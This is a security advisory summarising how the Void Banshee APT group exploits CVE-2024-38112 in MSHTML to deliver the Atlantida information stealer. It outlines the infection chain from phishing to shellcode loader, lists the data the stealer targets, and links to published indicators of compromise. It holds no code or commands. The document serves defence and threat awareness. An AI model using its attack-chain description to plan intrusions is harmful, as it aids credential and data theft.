Void Banshee APT Exploits Microsoft MHTML Flaw to Spread Atlantida Stealer

Summary:
The APT group Void Banshee has been exploiting a newly disclosed security flaw in the Microsoft MHTML browser engine CVE-2024-38112 to deploy the information-stealing malware Atlantida. Cybersecurity firm Trend Micro observed this activity in mid-May 2024, noting that the vulnerability was used in a multi-stage attack involving specially crafted internet shortcut (URL) files.

Trend Micro researchers Peter Girnus and Aliakbar Zahravi highlighted that variations of the Atlantida campaign have been active throughout 2024, using CVE-2024-38112 to enhance Void Banshee's infection chains. The ability of APT groups to exploit discontinued services like Internet Explorer poses a significant threat globally. Check Point previously disclosed a similar campaign exploiting the same flaw to distribute the Atlantida stealer. Microsoft addressed CVE-2024-38112, described as a spoofing vulnerability in the MSHTML browser engine, in a recent Patch Tuesday update. However, the Zero Day Initiative classified it as a remote code execution flaw.

The attack chain involves spear-phishing emails with links to ZIP archives containing URL files that exploit the vulnerability, redirecting victims to compromised sites hosting malicious HTML Application (HTA) files. Executing these HTA files triggers a Visual Basic Script (VBS) that downloads a PowerShell script, ultimately deploying a .NET trojan loader that decrypts and executes the Atlantida stealer using the Donut shellcode project. Modeled on open-source stealers like NecroStealer and PredatorTheStealer, Atlantida is designed to extract files, screenshots, geolocation data, and sensitive information from web browsers and applications such as Telegram, Steam, FileZilla, and cryptocurrency wallets.

Security Officer Comments:
Void Banshee's exploitation method is similar to a previous MSHTML vulnerability CVE-2021-40444 used in zero-day attacks. The group has a history of targeting North America, Europe, and Southeast Asia for information theft and financial gain.

Cloudflare recently reported that threat actors are quickly incorporating proof-of-concept (PoC) exploits into their arsenal, often within minutes of public release, as seen with CVE-2024-27198. Additionally, a new campaign using Facebook ads to promote fake Windows themes has been distributing the SYS01stealer, which targets Facebook business accounts to hijack and propagate malware. Trustwave noted that SYS01 focuses on exfiltrating browser data, including credentials, history, cookies, and Facebook account access tokens.

Suggested Corrections:

Trend Micro has published IOCs which can be used to detect and defend against the Void Banshee APT group:
https://www.trendmicro.com/content/...r-in-zero-day-attacks/IOCs-CVE-2024-38112.txt

Link(s):
https://thehackernews.com/2024/07/void-banshee-apt-exploits-microsoft.html